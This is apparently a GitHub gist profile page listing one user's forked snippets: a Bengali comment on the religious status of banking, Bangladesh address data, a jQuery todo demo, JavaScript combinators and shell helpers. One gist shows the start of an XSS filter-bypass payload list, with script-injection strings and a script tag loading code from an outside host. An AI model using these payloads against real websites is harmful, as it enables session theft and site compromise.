Skip to content

Instantly share code, notes, and snippets.

View AbiruzzamanMolla's full-sized avatar
🏠
Working from home

Abiruzzaman Molla AbiruzzamanMolla

🏠
Working from home
View GitHub Profile
কেউ কি দেখছেন না যে উনারা বুঝতে চাচ্ছে না!? উনারা সুদের পক্ষে উনাদের উনাদের যুক্তি উপস্থাপন করেই যাচ্ছে। উনারা তো আল্লাহ কে রিজিক দাতা বলে মানিতেই চাচ্ছে না উনারদের কমেন্টের ভাষ্য অনুযায়ী! নাউজুবিল্লাহ!
বাংলাদেশের অনেক আলেমরাই জানে না যে ব্যাংকিং হারাম। ইলম হাউজের বইটা সাজেস্ট করা হয়েছে এখানে। বইটি পড়ুন যদি সত্যিই জানতে চান, এবং মানতে চান। সবকিছু যে আপনার আমার মন মতো হবে এমনটা নাও হতে পারে। তাকী উসমানী সাহেবের আরো একটা বই আছে এই বিষয়ে সম্ভবত।
Asif Adnan ভাইয়ের প্রোফাইল্টা একটি ঘুরে উনার লেখাগুলো দেখে আসতে পারেন।
প্রযোজনীয় লিঙ্কঃ
১। https://www.youtube.com/playlist?list=PLE88E9ICdiphYjJkeeLL2O09eJoC8r7Dc
২। https://islamqa.info/en/answers/26771/working-in-banks-in-an-islamic-country
@AbiruzzamanMolla
AbiruzzamanMolla / address.json
Created July 7, 2018 18:39 — forked from AminulBD/address.json
Bangladdesh divisions, districts and upazila list in php array and json
{
"Rajshahi": {
"Joypurhat": [
"Akkelpur",
"Joypurhat Sadar",
"Kalai",
"Khetlal",
"Panchbibi"
],
"Bogura": [
@AbiruzzamanMolla
AbiruzzamanMolla / index.html
Created April 19, 2018 14:33 — forked from pifantastic/index.html
A simple todo list I'm using for an Intro to jQuery talk.
<!DOCTYPE hmtl>
<html>
<head><title>My todo list</title></head>
<body>
<h1>My todo list:</h1>
<form>
<input type="text" id="item" />
<input type="submit" id="save" value="Save" />
</form>
<ul id="list"></ul>

Keybase proof

I hereby claim:

  • I am asliabir on github.
  • I am asliabir (https://keybase.io/asliabir) on keybase.
  • I have a public key ASA_L8nBgE5Agrc-UqK_S68eVcOqvXWkZ3o9frdw4i370Qo

To claim this, I am signing this object:

@AbiruzzamanMolla
AbiruzzamanMolla / combinators.js
Created February 21, 2018 04:28 — forked from Avaq/combinators.js
Common combinators in JavaScript
const I = x => x;
const K = x => y => x;
const A = f => x => f(x);
const T = x => f => f(x);
const W = f => x => f(x)(x);
const C = f => y => x => f(x)(y);
const B = f => g => x => f(g(x));
const S = f => g => x => f(x)(g(x));
const P = f => g => x => y => f(g(x))(g(y));
const Y = f => (g => g(g))(g => f(x => g(g)(x)));
# Your init script
#
# Atom will evaluate this file each time a new window is opened. It is run
# after packages are loaded/activated and after the previous editor state
# has been restored.
#
# An example hack to log to the console when each text editor is saved.
#
# atom.workspace.observeTextEditors (editor) ->
# editor.onDidSave ->
@AbiruzzamanMolla
AbiruzzamanMolla / anmol-terminal.sh
Created February 14, 2018 09:11 — forked from anmoljagetia/anmol-terminal.sh
This is a script that adds a profile similar to the screenshot shown with Flatabulous in Gnome-Terminal.
#!/usr/bin/env bash
# Base16 - Gnome Terminal color scheme install script
[[ -z "$PROFILE_NAME" ]] && PROFILE_NAME="flatabulous-terminal"
[[ -z "$PROFILE_SLUG" ]] && PROFILE_SLUG="flatabulous-terminal"
[[ -z "$DCONF" ]] && DCONF=dconf
[[ -z "$UUIDGEN" ]] && UUIDGEN=uuidgen
dset() {
local key="$1"; shift
@AbiruzzamanMolla
AbiruzzamanMolla / README.md
Created January 13, 2018 09:32 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet
@AbiruzzamanMolla
AbiruzzamanMolla / xxsfilterbypass.lst
Created November 20, 2017 10:36 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@AbiruzzamanMolla
AbiruzzamanMolla / servers.py
Created December 20, 2016 22:16 — forked from maateen/servers.py
Hello Sysadmin, make life easier on Terminal. :)
"""
Documentation
1. At first, save the entire script as servers.py in /home/your-username/ directory.
Also you can simply use the below command:
curl "https://gist.githubusercontent.com/maateen/1582a28d62437caaf5cf9098303bab79/raw/e216b3b1ff8f1323fb79de4ae5a4c5b24a8b2c4d/servers.py" > ~/servers.py
2. Change info in servers = {} portion according to your need.
Always use Server Identity at the left side of : sign and SSH Login Command at the right side.